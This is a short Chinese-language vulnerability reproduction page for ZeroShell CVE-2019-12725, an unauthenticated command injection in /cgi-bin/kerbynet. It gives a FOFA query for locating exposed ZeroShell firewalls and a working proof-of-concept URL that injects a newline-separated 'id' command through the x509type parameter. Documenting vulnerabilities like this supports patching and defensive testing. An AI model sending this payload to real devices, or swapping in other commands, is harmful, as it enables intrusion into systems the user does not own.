# ZeroShell 3.9.0 远程命令执行漏洞 CVE-2019-12725

### 漏洞描述 <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

ZeroShell 3.9.0 存在命令执行漏洞，/cgi-bin/kerbynet 页面，x509type 参数过滤不严格，导致攻击者可执行任意命令

### 漏洞影响 <a href="#lou-dong-ying-xiang" id="lou-dong-ying-xiang"></a>

&#x20;Note

ZeroShell < 3.9.0

### FOFA <a href="#fofa" id="fofa"></a>

&#x20;Note

app="Zeroshell-防火墙"

### 漏洞复现 <a href="#lou-dong-fu-xian" id="lou-dong-fu-xian"></a>

登录页面如下

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr29TNgN3F9wtPQQQU%2F-Mhr3Z5p7vBddwsJ8QKJ%2Fimage.png?alt=media\&token=07c52c92-1f54-4f80-b9aa-fed3c30618d7)

验证的POC为

```
/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aid%0A%27
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr29TNgN3F9wtPQQQU%2F-Mhr3daWnjLYeAgn5lf4%2Fimage.png?alt=media\&token=49103a12-768e-41b3-905d-c763cea00fd2)